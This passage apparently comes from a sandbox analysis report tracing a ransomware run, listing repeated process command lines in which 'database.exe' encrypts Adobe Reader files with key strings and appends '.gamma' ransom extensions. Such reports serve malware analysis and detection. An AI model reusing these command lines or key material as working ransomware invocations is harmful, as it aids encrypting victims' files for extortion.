                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\acro20.lng.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                            PID:4448
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.lng.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                              PID:3040
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.RSD.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                              PID:6184
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\Vdk10.rst.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:1000
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                PID:3700
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\2d.x3d.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:5856
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\3difr.x3d.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:3368
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvDX8.x3d.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:5100
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvSOFT.x3d.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:3480
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prcr.x3d.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                          PID:3844
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                            PID:5456
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:4088
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\database.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:3520
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:3768
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:2680
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6088
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6580
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:2604
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6576
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif.id-DA208E5B.[[email protected]].gamma"
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:6844
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
